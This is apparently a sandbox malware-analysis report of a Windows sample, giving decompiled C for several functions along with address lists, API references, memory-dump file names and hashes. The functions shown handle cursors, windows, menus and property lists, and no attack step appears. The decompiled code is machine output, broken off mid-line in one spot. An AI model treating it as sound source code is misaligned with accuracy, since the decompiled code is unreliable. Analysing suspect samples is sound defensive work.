							__eflags =  *0xe8738c;
							_t204 = _t245;
							if( *0xe8738c != 0) {
								E00CB7A0A(_t196, _t204, _t243);
								 *(_t255 - 0x34) =  *(_t255 + 0xc);
								 *(_t255 - 0x30) =  *(_t255 + 0x10);
								ScreenToClient( *(_t245 + 0x20), _t255 - 0x34);
								_t250 =  *( *_t245 + 0x390);
								 *0xe17a64( *(_t255 - 0x34),  *(_t255 - 0x30));
								_t196 =  *( *( *_t245 + 0x390))();
								_t109 =  *(_t245 + 0xbf4);
								 *(_t255 - 0x24) = _t196;
								_t208 = _t196;
								 *(_t245 + 0xbf4) = _t196;
								__eflags = _t109 - 0xffffffff;
								if(_t109 != 0xffffffff) {
									E00CF1BC5(_t196, _t245, _t109);
									_t208 =  *(_t245 + 0xbf4);
								}
								__eflags = _t208 - 0xffffffff;
								if(_t208 != 0xffffffff) {
									E00CF1BC5(_t196, _t245, _t208);
								}
								_t209 =  *0xe87374; // 0x0
								__eflags = _t209 - _t245;
								if(_t209 != _t245) {
									 *0xe87374 = _t245;
									__eflags = _t209;
									if(_t209 != 0) {
										_t22 = _t209 + 0xbf4;
										 *_t22 =  *(_t209 + 0xbf4) | 0xffffffff;
										__eflags =  *_t22;
										E00CF1BC5(_t196, _t209,  *(_t209 + 0xbf4));
									}
								}
								UpdateWindow( *(_t245 + 0x20));
								__eflags = _t196;
								if(__eflags < 0) {
									goto L33;
								} else {
									_t196 = E00CF13CC(_t196, _t245, _t245, _t250, __eflags,  *(_t245 + 0xbf4));
									__eflags = _t196;
									if(_t196 == 0) {
										goto L33;
									} else {
										_t250 =  *( *_t196 + 0x60);
										 *0xe17a64();
										_t113 =  *( *( *_t196 + 0x60))();
										__eflags = _t113;
										if(_t113 != 0) {
											_t250 =  *( *_t196 + 0x50);
											 *0xe17a64();
											_t116 =  *( *( *_t196 + 0x50))();
											__eflags = _t116;
											if(_t116 == 0) {
												goto L33;
											} else {
												__eflags =  *(_t255 + 0xc) - 0xffffffff;
												if(__eflags == 0) {
													__eflags =  *(_t255 + 0x10) - 0xffffffff;
													if(__eflags == 0) {
														 *(_t255 - 0x20) = 0;
														 *((intOrPtr*)(_t255 - 0x1c)) = 0;
														 *((intOrPtr*)(_t255 - 0x18)) = 0;
														 *((intOrPtr*)(_t255 - 0x14)) = 0;
														GetClientRect( *(_t245 + 0x20), _t255 - 0x20);
														E00CB9BF2(_t245, _t255 - 0x20);
														_t239 =  *((intOrPtr*)(_t255 - 0x1c)) + 5;
														__eflags = _t239;
														 *(_t255 + 0xc) =  *(_t255 - 0x20) + 5;
														 *(_t255 + 0x10) = _t239;
													}
												}
												 *(_t255 - 0x2c) = 0xe19a6c;
												 *(_t255 - 0x28) = 0;
												_t216 = _t255 - 0x2c;
												 *(_t255 - 4) = 0;
												E00CF2290(_t216, 0x3ee6);
												_t119 = E00CBAF23(_t196, _t216, _t243, _t245, 0, __eflags, GetSubMenu( *(_t255 - 0x28), 0));
												 *(_t255 - 0x24) = _t119;
												__eflags = _t119;
												if(__eflags == 0) {
													E00CAA4E7(_t196, _t216, _t245, 0, __eflags);
													asm("int3");
													_push(4);
													E00DDD52C(0xe08831, _t196, _t245, 0);
													_t252 = E00CF13CC(_t196, _t216, _t245, 0, __eflags,  *((intOrPtr*)(_t216 + 0xbf4)));
													__eflags = _t252;
													if(__eflags == 0) {
														L48:
														E00CAA4E7(_t196, _t216, _t245, _t252, __eflags);
														asm("int3");
														_t197 = _t216;
														_t125 = E00CB236A(_t197, _t216, __eflags, _t196);
														__eflags = _t125 - 0xffffffff;
														if(_t125 != 0xffffffff) {
															_push(_t252);
															_push(_t245);
															__eflags =  *(E00CC19ED() + 0xf0);
															if(__eflags == 0) {
																E00CACEEE(_t197, 0, _t252, __eflags);
																_t161 = LoadCursorW( *(E00CACEEE(_t197, 0, _t252, __eflags) + 0xc), 0x7904);
																_t252 = _t161;
																 *(E00CC19ED() + 0xf0) = _t161;
															}
															__eflags =  *(E00CC19ED() + 0xf4);
															if(__eflags == 0) {
																E00CACEEE(_t197, 0, _t252, __eflags);
																_t156 = LoadCursorW( *(E00CACEEE(_t197, 0, _t252, __eflags) + 0xc), 0x7905);
																_t252 = _t156;
																 *(E00CC19ED() + 0xf4) = _t156;
															}
															__eflags =  *(E00CC19ED() + 0xfc);
															if(__eflags == 0) {
																E00CACEEE(_t197, 0, _t252, __eflags);
																_t151 = LoadCursorA(0, 0x7f86);
																_t252 = _t151;
																 *(E00CC19ED() + 0xfc) = _t151;
															}
															_t129 = E00CD8851(_t243, _t197);
															__eflags = _t129;
															if(_t129 != 0) {
																_t226 = E00CD8851(_t243, _t197);
																_t146 =  *0xe885fc; // 0x0
																__eflags = _t146;
																if(_t146 != 0) {
																	L60:
																	__eflags = E00CB7738(_t146) & 0x00400000;
																	E00CDCBEC(E00CB7738(_t146) & 0x00400000);
																} else {
																	_t146 = E00CB2BE8(_t226, _t252);
																	__eflags = _t146;
																	if(_t146 != 0) {
																		goto L60;
																	}
																}
															}
															__eflags =  *(_t197 + 0xb9c);
															if(__eflags == 0) {
																_t143 = E00CACF3C(_t197, 0, _t252, __eflags);
																__eflags =  *(_t143 + 0x100);
																if( *(_t143 + 0x100) != 0) {
																	E00D7AC85(_t197 + 0xc90, _t197);
																}
															}
															E00CB9BC6(_t197, _t197 + 0xcec, 0, CreatePen(0, 1,  *(E00CC19ED() + 0x28)));
															E00D0E6AD(_t197, 0, _t252, __eflags);
															_t136 = E00CC1A50(_t197, 0, _t252, __eflags);
															 *0xe17a64(_t197 + 0xd08, _t197, 2);
															_t138 =  *((intOrPtr*)( *((intOrPtr*)( *_t136 + 0xbc))))();
															 *(_t197 + 0xbd8) = _t138;
															_t248 = _t197;
															_pop(_t254);
															__eflags = _t138;
															if(__eflags == 0) {
																SetWindowRgn( *(_t197 + 0x20), 0, 0);
															} else {
																E00CF8B0D(_t197, _t197, _t243, _t248, _t254, __eflags);
															}
															E00CB7F2F(0xe873c8, __eflags, _t197);
															_t141 = 0;
															__eflags = 0;
														} else {
															_t141 = _t125;
														}
														return _t141;
													} else {
														_t216 =  *0xe8878c; // 0x0
														_t196 = 0;
														__eflags = _t216;
														if(_t216 == 0) {
															L40:
															__eflags =  *(_t252 + 4) - _t196;
															if(__eflags == 0) {
																goto L44;
															} else {
																goto L41;
															}
														} else {
															__eflags =  *(_t252 + 4);
															if( *(_t252 + 4) != 0) {
																L41:
																_t245 =  *0xe87380; // 0x0
																__eflags = _t245;
																if(__eflags == 0) {
																	goto L48;
																} else {
																	L44:
																	E00CAFF34( *((intOrPtr*)(E00CACEEE(_t196, 0xe87460, _t252, __eflags) + 4)));
																	 *(_t255 - 4) = _t196;
																	__eflags =  *(_t252 + 4) - _t196;
																	if(__eflags == 0) {
																		_t165 =  *((intOrPtr*)(_t252 + 0x34));
																	} else {
																		_t165 =  *((intOrPtr*)(_t252 + 0x38));
																	}
																	_push(_t165);
																	E00CDB0A1(_t196, 0xe87460, _t243, 0xe87460, _t252, __eflags, _t259);
																	_t167 = E00CB0895(_t255 - 0xd, _t243, __eflags);
																	goto L39;
																}
															} else {
																__eflags = E00D4B497(_t216,  *((intOrPtr*)(_t252 + 0x20)));
																if(__eflags == 0) {
																	goto L40;
																} else {
																	_t167 = E00D7A59D(0, _t169, _t243, _t245, _t252, __eflags);
																	L39:
																	return E00DDD4FA(_t167);
																}
															}
														}
													}
												} else {
													__eflags =  *(_t196 + 0x3c);
													if( *(_t196 + 0x3c) != 0) {
														EnableMenuItem( *(_t119 + 4), 0x420e, 1);
													}
													_t250 =  *( *_t245 + 0x408);
													 *0xe17a64(_t196,  *(_t255 - 0x24));
													_t172 =  *( *( *_t245 + 0x408))();
													__eflags = _t172;
													if(_t172 != 0) {
														_t174 =  *(_t245 + 0xbf4) - 1;
														__eflags =  *(_t245 + 0xbf4) - 1;
														if(__eflags >= 0) {
															_t177 = E00CF13CC(_t196, _t245, _t245, _t250, __eflags, _t174);
															__eflags = _t177;
															if(__eflags != 0) {
																__eflags =  *(_t177 + 0x50);
																if(__eflags == 0) {
																	EnableMenuItem( *( *(_t255 - 0x24) + 4), 0x4215, 1);
																}
															}
														}
														_push(0);
														_push(_t245);
														_push( *(_t255 + 0x10));
														_push( *(_t255 + 0xc));
														_t250 = 2;
														_push(_t250);
														E00CB55C3( *(_t255 - 0x24), __eflags);
														 *(_t255 - 4) = _t250;
													} else {
														 *(_t255 - 4) = 1;
													}
													 *(_t255 - 0x2c) = 0xe19a6c;
													E00CBA9D9(_t255 - 0x2c);
													goto L33;
												}
											}
										} else {
											 *(_t245 + 0xbf4) =  *(_t245 + 0xbf4) | 0xffffffff;
											E00CF1BC5(_t196, _t245,  *(_t255 - 0x24));
											UpdateWindow( *(_t245 + 0x20));
											goto L33;
										}
									}
								}
							} else {
								E00CE40FA(_t204, _t196,  *(_t255 + 0xc),  *(_t255 + 0x10));
								goto L33;
							}
						}
					}
				} else {
					MessageBeep(0xffffffff);
					L33:
					return E00DDD50E(_t196, _t245, _t250);
				}
			}

0x00cf36ff
0x00cf36ff
0x00cf36ff
0x00cf36ff
0x00cf3706
0x00cf370b
0x00cf3714
0x00cf3717
0x00cf3731
0x00cf3739
0x00cf3741
0x00cf3743
0x00cf3745
0x00000000
0x00cf374b
0x00cf374b
0x00cf3751
0x00000000
0x00cf3757
0x00cf375b
0x00cf3763
0x00cf376b
0x00cf376d
0x00cf3774
0x00cf3776
0x00cf3789
0x00cf3794
0x00cf379e
0x00cf37a1
0x00cf37af
0x00cf37b7
0x00cf37c1
0x00cf37c3
0x00cf37c9
0x00cf37cc
0x00cf37ce
0x00cf37d4
0x00cf37d7
0x00cf37dc
0x00cf37e1
0x00cf37e1
0x00cf37e7
0x00cf37ea
0x00cf37ef
0x00cf37ef
0x00cf37f4
0x00cf37fa
0x00cf37fc
0x00cf37fe
0x00cf3804
0x00cf3806
0x00cf380e
0x00cf380e
0x00cf380e
0x00cf3816
0x00cf3816
0x00cf3806
0x00cf381e
0x00cf3824
0x00cf3826
0x00000000
0x00cf382c
0x00cf3839
0x00cf383b
0x00cf383d
0x00000000
0x00cf3843
0x00cf3845
0x00cf384a
0x00cf3852
0x00cf3854
0x00cf3856
0x00cf3879
0x00cf387e
0x00cf3886
0x00cf3888
0x00cf388a
0x00000000
0x00cf3890
0x00cf3892
0x00cf3896
0x00cf3898
0x00cf389c
0x00cf38a1
0x00cf38a8
0x00cf38ab
0x00cf38ae
0x00cf38b1
0x00cf38bd
0x00cf38cb
0x00cf38cb
0x00cf38ce
0x00cf38d1
0x00cf38d1
0x00cf389c
0x00cf38d4
0x00cf38db
0x00cf38e3
0x00cf38e6
0x00cf38e9
0x00cf38f9
0x00cf38fe
0x00cf3901
0x00cf3903
0x00cf39a2
0x00cf39a7
0x00cf39a8
0x00cf39af
0x00cf39bf
0x00cf39c1
0x00cf39c3
0x00cf3a34
0x00cf3a34
0x00cf3a39
0x00cf3a3b
0x00cf3a3d
0x00cf3a42
0x00cf3a45
0x00cf3a4e
0x00cf3a4f
0x00cf3a57
0x00cf3a5d
0x00cf3a5f
0x00cf3a72
0x00cf3a78
0x00cf3a7f
0x00cf3a7f
0x00cf3a8a
0x00cf3a90
0x00cf3a92
0x00cf3aa5
0x00cf3aab
0x00cf3ab2
0x00cf3ab2
0x00cf3abd
0x00cf3ac3
0x00cf3ac5
0x00cf3ad0
0x00cf3ad6
0x00cf3add
0x00cf3add
0x00cf3ae4
0x00cf3aea
0x00cf3aec
0x00cf3af5
0x00cf3af7
0x00cf3afc
0x00cf3afe
0x00cf3b09
0x00cf3b10
0x00cf3b16
0x00cf3b00
0x00cf3b00
0x00cf3b05
0x00cf3b07
0x00000000
0x00000000
0x00cf3b07
0x00cf3afe
0x00cf3b1b
0x00cf3b21
0x00cf3b23
0x00cf3b28
0x00cf3b2e
0x00cf3b37
0x00cf3b37
0x00cf3b2e
0x00cf3b55
0x00cf3b64
0x00cf3b69
0x00cf3b7b
0x00cf3b83
0x00cf3b85
0x00cf3b8b
0x00cf3b8c
0x00cf3b8d
0x00cf3b8f
0x00cf3ba1
0x00cf3b91
0x00cf3b93
0x00cf3b93
0x00cf3bad
0x00cf3bb2
0x00cf3bb2
0x00cf3a47
0x00cf3a47
0x00cf3a47
0x00cf3bb5
0x00cf39c5
0x00cf39c5
0x00cf39cb
0x00cf39cd
0x00cf39cf
0x00cf39ef
0x00cf39ef
0x00cf39f2
0x00000000
0x00000000
0x00000000
0x00000000
0x00cf39d1
0x00cf39d1
0x00cf39d4
0x00cf39f4
0x00cf39f4
0x00cf39fa
0x00cf39fc
0x00000000
0x00cf39fe
0x00cf3a05
0x00cf3a0d
0x00cf3a12
0x00cf3a15
0x00cf3a18
0x00cf3a1f
0x00cf3a1a
0x00cf3a1a
0x00cf3a1a
0x00cf3a22
0x00cf3a25
0x00cf3a2d
0x00000000
0x00cf3a2d
0x00cf39d6
0x00cf39de
0x00cf39e0
0x00000000
0x00cf39e2
0x00cf39e4
0x00cf39e9
0x00cf39ee
0x00cf39ee
0x00cf39e0
0x00cf39d4
0x00cf39cf
0x00cf3909
0x00cf3909
0x00cf390c
0x00cf3918
0x00cf3918
0x00cf3924
0x00cf392c
0x00cf3934
0x00cf3936
0x00cf3938
0x00cf3949
0x00cf3949
0x00cf394c
0x00cf3951
0x00cf3956
0x00cf3958
0x00cf395a
0x00cf395e
0x00cf396d
0x00cf396d
0x00cf395e
0x00cf3958
0x00cf3976
0x00cf3978
0x00cf3979
0x00cf397c
0x00cf3981
0x00cf3982
0x00cf3983
0x00cf3988
0x00cf393a
0x00cf393a
0x00cf393a
0x00cf398e
0x00cf3995
0x00000000
0x00cf3995
0x00cf3903
0x00cf3858
0x00cf385b
0x00cf3864
0x00cf386c
0x00000000
0x00cf386c
0x00cf3856
0x00cf383d
0x00cf3778
0x00cf377f
0x00000000
0x00cf377f
0x00cf3776
0x00cf3751
0x00cf3722
0x00cf3724
0x00cf399a
0x00cf399f
0x00cf399f

APIs

__EH_prolog3_GS.LIBCMT ref: 00CF3706
MessageBeep.USER32(000000FF), ref: 00CF3724
ScreenToClient.USER32 ref: 00CF37A1
UpdateWindow.USER32(?), ref: 00CF381E
UpdateWindow.USER32(?), ref: 00CF386C
__EH_prolog3.LIBCMT ref: 00CF39AF

Strings

`t, xrefs: 00CF3A00

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: UpdateWindow$BeepClientH_prolog3H_prolog3_MessageScreen
String ID: `t
API String ID: 786914320-3481165120
Opcode ID: 3b37b9aa455cc8649d6bdae408745d4792ea3fdf81eef05a6ba7f8654d7c8378
Instruction ID: 4aba9a88636b7e73a9d0aa7d567c0e35c8319653621a0579d10faacae39a73d8
Opcode Fuzzy Hash: 3b37b9aa455cc8649d6bdae408745d4792ea3fdf81eef05a6ba7f8654d7c8378
Instruction Fuzzy Hash: 0891D270A0024AEFCF55AF65C988ABD7BB2FF48310F144129FA6667291CB719B01DF52

Uniqueness

Uniqueness Score: -1.00%

Function 00D0850F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 213
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00D0850F(signed int __ecx) {
				signed int _v8;
				struct tagRECT _v24;
				signed short _v28;
				struct tagPOINT _v36;
				intOrPtr _v40;
				char _v44;
				struct HICON__* _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t55;
				intOrPtr _t61;
				intOrPtr* _t66;
				intOrPtr _t67;
				void* _t69;
				signed short _t76;
				struct HICON__* _t85;
				struct HICON__* _t93;
				struct HICON__* _t97;
				long _t98;
				signed short _t99;
				intOrPtr _t101;
				long _t102;
				signed short _t107;
				signed int _t126;
				intOrPtr _t128;
				signed short _t129;
				signed int _t130;

				_t55 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t55 ^ _t130;
				_t97 = 0;
				_t126 = __ecx;
				_v36.x = 0;
				_v36.y = 0;
				GetCursorPos( &_v36);
				_v24.left = 0;
				_v24.top = 0;
				_v24.right = 0;
				_v24.bottom = 0;
				GetWindowRect( *(_t126 + 0x20),  &_v24);
				_t61 =  *((intOrPtr*)(_t126 + 0x9c));
				_t125 = 0x7923;
				_t127 = 0;
				if(_t61 == 0x7923 || _t61 == 0x7922) {
					_t101 = _v36.y;
					if(_t101 >= _v24.top) {
						__eflags = _t101 - _v24.bottom;
						if(_t101 > _v24.bottom) {
							_t127 = 0x791d;
						}
					} else {
						_t127 = 0x7917;
					}
					if(_t61 == _t125) {
						goto L8;
					}
					goto L7;
				} else {
					L7:
					if(_t61 != 0x7921) {
						L18:
						if( *((intOrPtr*)(_t126 + 0x98)) == _t97) {
							__eflags = _t127;
							if(__eflags != 0) {
								SetCursor(LoadCursorW( *(E00CACEEE(_t97, _t126, _t127, __eflags) + 0xc), _t127 & 0x0000ffff));
								_t98 = _v36.x;
								__eflags = _t98 - _v24.right;
								if(_t98 <= _v24.right) {
									__eflags = _t98 - _v24.left;
									if(_t98 >= _v24.left) {
										_t99 = 0;
										__eflags = 0;
									} else {
										_t99 = _t98 - _v24.left;
									}
								} else {
									_t99 = _t98 - _v24.right;
								}
								_t128 = _v36.y;
								__eflags = _t128 - _v24.bottom;
								if(_t128 <= _v24.bottom) {
									__eflags = _t128 - _v24.top;
									if(_t128 >= _v24.top) {
										_t129 = 0;
										__eflags = 0;
									} else {
										_t129 = _t128 - _v24.top;
									}
								} else {
									_t129 = _t128 - _v24.bottom;
								}
								_t66 = E00CB29F1(_t126);
								_v48 = _t66;
								_t67 =  *((intOrPtr*)(_t126 + 0x9c));
								_t125 =  *( *_t66 + 0x1b4);
								_v28 =  *( *_t66 + 0x1b4);
								__eflags = _t67 - 0x7923;
								if(_t67 == 0x7923) {
									L37:
									_t107 = 1;
									__eflags = _t67 - 0x7923;
									if(_t67 == 0x7923) {
										goto L40;
									}
									goto L38;
								} else {
									__eflags = _t67 - 0x7922;
									if(_t67 == 0x7922) {
										goto L37;
									}
									_t107 = 0;
									L38:
									__eflags = _t67 - 0x7921;
									if(_t67 == 0x7921) {
										L40:
										_t69 = 1;
										__eflags = 1;
										L41:
										 *0xe17a64( &_v44, _t99, _t129, _t69, _t107);
										_t97 = _v48;
										_v28();
										E00CB7B32(_t126, 0);
										_t76 = E00CACA6C(" (\xef\xbf\xbd", E00CB277F(_t97, _t126, _t125, GetParent( *(_t97 + 0										_v28 = _t76;
										_push(1);
										_push(_v40);
										_push(_v44);
										__eflags = _t76;
										if(_t76 != 0) {
											_t127 =  *( *_t76 + 0x1b0);
											 *0xe17a64(_t97);
											 *( *( *_t76 + 0x1b0))();
										} else {
											_t127 =  *(_t97->i + 0x16c);
											 *0xe17a64();
											 *( *(_t97->i + 0x16c))();
										}
										UpdateWindow( *(_t126 + 0x20));
										__eflags =  *((intOrPtr*)(_t126 + 0x90)) - 0x10;
										_t85 = E00CB7A83(_t126, 0xe86aa8,  *((intOrPtr*)(_t126 + 0x90)) - 0x10,  *((intOrPtr*)(_t126 + 0x94)) - 0x10, 0, 0, 0x51);
										goto L45;
									}
									_t69 = 0;
									goto L41;
								}
							}
							_t85 = SetCursor( *(_t126 + 0xa0));
							goto L45;
						} else {
							KillTimer( *(_t126 + 0x20), 0xec08);
							ReleaseCapture();
							SetCursor(_t97);
							_t93 = E00CB29F1(_t126);
							_t125 =  *_t126;
							_t97 = _t93;
							_t127 =  *( *_t126 + 0x60);
							 *0xe17a64();
							_t85 =  *( *( *_t126 + 0x60))();
							_t126 =  *(_t97 + 0x88);
							if(_t126 != 0) {
								_t127 =  *( *_t126 + 4);
								 *0xe17a64(1);
								_t85 =  *( *( *_t126 + 4))();
							}
							 *(_t97 + 0x88) =  *(_t97 + 0x88) & 0x00000000;
							L45:
							return E00DDCBCE(_t85, _t97, _v8 ^ _t130, _t125, _t126, _t127);
						}
					}
					L8:
					_t102 = _v36.x;
					if(_t102 >= _v24.left) {
						__eflags = _t102 - _v24.right;
						if(_t102 > _v24.right) {
							__eflags = _t127;
							if(_t127 != 0) {
								__eflags = _t61 - _t125;
								if(_t61 == _t125) {
									_t127 = _t127 + 1;
									__eflags = _t127;
								}
							} else {
								_t127 = 0x791b;
							}
						}
					} else {
						if(_t127 != 0) {
							__eflags = _t61 - _t125;
							if(_t61 == _t125) {
								_t127 = _t127 - 1;
							}
						} else {
							_t127 = 0x7919;
						}
					}
					goto L18;
				}
			}

0x00d08515
0x00d0851c
0x00d08525
0x00d08528
0x00d0852a
0x00d0852d
0x00d08530
0x00d08539
0x00d08540
0x00d08543
0x00d08546
0x00d08549
0x00d0854f
0x00d08555
0x00d0855a
0x00d0855e
0x00d08567
0x00d0856d
0x00d08576
0x00d08579
0x00d0857b
0x00d0857b
0x00d0856f
0x00d0856f
0x00d0856f
0x00d08582
0x00000000
0x00000000
0x00000000
0x00d08584
0x00d08584
0x00d08589
0x00d085ba
0x00d085c0
0x00d08620
0x00d08622
0x00d08649
0x00d0864f
0x00d08652
0x00d08655
0x00d0865c
0x00d0865f
0x00d08666
0x00d08666
0x00d08661
0x00d08661
0x00d08661
0x00d08657
0x00d08657
0x00d08657
0x00d08668
0x00d0866b
0x00d0866e
0x00d08675
0x00d08678
0x00d0867f
0x00d0867f
0x00d0867a
0x00d0867a
0x00d0867a
0x00d08670
0x00d08670
0x00d08670
0x00d08683
0x00d08688
0x00d0868d
0x00d08693
0x00d08699
0x00d0869c
0x00d086a1
0x00d086ae
0x00d086b0
0x00d086b1
0x00d086b6
0x00000000
0x00000000
0x00000000
0x00d086a3
0x00d086a3
0x00d086a8
0x00000000
0x00000000
0x00d086aa
0x00d086b8
0x00d086b8
0x00d086bd
0x00d086c3
0x00d086c5
0x00d086c5
0x00d086c6
0x00d086d0
0x00d086d6
0x00d086db
0x00d086e2
0x00d086fc
0x00d08701
0x00d08706
0x00d08708
0x00d0870b
0x00d0870e
0x00d08710
0x00d0872b
0x00d08733
0x00d0873c
0x00d08712
0x00d08714
0x00d0871c
0x00d08724
0x00d08724
0x00d08741
0x00d0875f
0x00d08768
0x00000000
0x00d08768
0x00d086bf
0x00000000
0x00d086bf
0x00d086a1
0x00d0862a
0x00000000
0x00d085c2
0x00d085ca
0x00d085d0
0x00d085d7
0x00d085df
0x00d085e4
0x00d085e6
0x00d085e8
0x00d085ed
0x00d085f5
0x00d085f7
0x00d085ff
0x00d08605
0x00d0860a
0x00d08612
0x00d08612
0x00d08614
0x00d0876d
0x00d0877b
0x00d0877b
0x00d085c0
0x00d0858b
0x00d0858b
0x00d08591
0x00d085a5
0x00d085a8
0x00d085aa
0x00d085ac
0x00d085b5
0x00d085b7
0x00d085b9
0x00d085b9
0x00d085b9
0x00d085ae
0x00d085ae
0x00d085ae
0x00d085ac
0x00d08593
0x00d08595
0x00d0859e
0x00d085a0
0x00d085a2
0x00d085a2
0x00d08597
0x00d08597
0x00d08597
0x00d08595
0x00000000
0x00d08591

APIs

GetCursorPos.USER32(?), ref: 00D08530
GetWindowRect.USER32 ref: 00D08549
KillTimer.USER32(?,0000EC08), ref: 00D085CA
ReleaseCapture.USER32 ref: 00D085D0
SetCursor.USER32(00000000), ref: 00D085D7
SetCursor.USER32(?), ref: 00D0862A
LoadCursorW.USER32(?,00000000), ref: 00D08642
SetCursor.USER32(00000000), ref: 00D08649
GetParent.USER32(?), ref: 00D086EA
UpdateWindow.USER32(?), ref: 00D08741

Strings

(, xrefs: 00D086F7

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Cursor$Window$CaptureKillLoadParentRectReleaseTimerUpdate
String ID: (
API String ID: 2135910768-374781203
Opcode ID: fab8ca2a2f177a24a5031534bf395974cb8dd1bebbd6ccaf129d54ccd8d9be5f
Instruction ID: e2a8890499065a83d550f3141a9d08042fb724f502e7d5c067f45036271d61da
Opcode Fuzzy Hash: fab8ca2a2f177a24a5031534bf395974cb8dd1bebbd6ccaf129d54ccd8d9be5f
Instruction Fuzzy Hash: A3716031E04215DFDF149F64CC88ABDB776FB48700F654169E88AB7291CB35AD41EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CCE081 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 160
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00CCE081(intOrPtr* __ecx, void* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				int _v56;
				intOrPtr _v60;
				char* _v68;
				void* _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t45;
				void* _t49;
				void* _t50;
				void* _t69;
				struct HICON__* _t89;
				struct HICON__* _t94;
				int _t96;
				void* _t121;
				intOrPtr* _t122;
				signed int _t129;
				signed int _t134;

				_t121 = __edx;
				_t45 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t45 ^ _t134;
				_t96 = 0;
				_t122 = __ecx;
				_v24.left = 0;
				_v24.top = 0;
				_v24.right = 0;
				_v24.bottom = 0;
				SetRectEmpty( &_v24);
				_t49 = E00CC19ED();
				_t135 =  *((intOrPtr*)(_t49 + 0xf0));
				if( *((intOrPtr*)(_t49 + 0xf0)) == 0) {
					E00CACEEE(0, _t122, _t123, _t135);
					_t94 = LoadCursorW( *(E00CACEEE(0, _t122, _t123, _t135) + 0xc), 0x7904);
					_t123 = _t94;
					 *(E00CC19ED() + 0xf0) = _t94;
				}
				_t50 = E00CC19ED();
				_t136 =  *((intOrPtr*)(_t50 + 0xf4)) - _t96;
				if( *((intOrPtr*)(_t50 + 0xf4)) == _t96) {
					E00CACEEE(_t96, _t122, _t123, _t136);
					_t89 = LoadCursorW( *(E00CACEEE(_t96, _t122, _t123, _t136) + 0xc), 0x7905);
					 *(E00CC19ED() + 0xf4) = _t89;
				}
				 *0xe17a64();
				 *((intOrPtr*)( *((intOrPtr*)( *_t122 + 0x194))))();
				_v76 = 6;
				_v56 = _t96;
				_v68 = "Property";
				_v60 = 0x64;
				 *0xe17a64();
				SendMessageA( *( *((intOrPtr*)( *((intOrPtr*)( *_t122 + 0x164))))() + 0x20), 0x1201, _t96,  &_v76);
				_v68 = "Value";
				_v60 = 0x64;
				 *0xe17a64();
				SendMessageA( *( *((intOrPtr*)( *((intOrPtr*)( *_t122 + 0x164))))() + 0x20), 0x1201, 1,  &_v76);
				 *0xe17a64(0x50000001,  &_v24, _t122, 2);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x278)) + 0x164))))();
				_t129 =  *( *((intOrPtr*)(_t122 + 0x80)) + 0x164);
				 *0xe17a64(_t122, 1);
				 *_t129();
				SendMessageA( *(_t122 + 0xa0), 0x401, 1, _t96);
				_t69 = E00CC19ED();
				_t130 = _t129 | 0xffffffff;
				if( *((intOrPtr*)(_t69 + 0x1c4)) != (_t129 | 0xffffffff)) {
					SendMessageA( *(_t122 + 0xa0), 0x418, _t96,  *(E00CC19ED() + 0x1c4));
				}
				E00CB7A83(_t122 + 0x80, 0xe86aa8, _t130, _t130, _t130, _t130, 0x13);
				 *0xe17a64(_t122);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x1d8)) + 0x164))))();
				if(E00CB277F(_t96, _t122 + 0x1d8, _t121, GetParent( *(_t122 + 0x20))) == 0 || E00CACB0B(_t75, 0xe19e40) == 0) {
					_t96 = 1;
				}
				 *(_t122 + 0x394) = _t96;
				_t132 =  *((intOrPtr*)( *_t122 + 0x170));
				 *0xe17a64();
				 *((intOrPtr*)( *((intOrPtr*)( *_t122 + 0x170))))();
				E00CCD95F(_t96, _t122, _t121);
				return E00DDCBCE(E00CCD7B8(_t96, _t122, _t121, _t122,  *((intOrPtr*)( *_t122 + 0x170)), 1), _t96, _v8 ^ _t134, _t121, _t122, _t132);
			}

0x00cce081
0x00cce087
0x00cce08e
0x00cce094
0x00cce09a
0x00cce09c
0x00cce09f
0x00cce0a2
0x00cce0a5
0x00cce0a8
0x00cce0ae
0x00cce0b3
0x00cce0b9
0x00cce0bb
0x00cce0ce
0x00cce0d4
0x00cce0db
0x00cce0db
0x00cce0e1
0x00cce0e6
0x00cce0ec
0x00cce0ee
0x00cce101
0x00cce10e
0x00cce10e
0x00cce11e
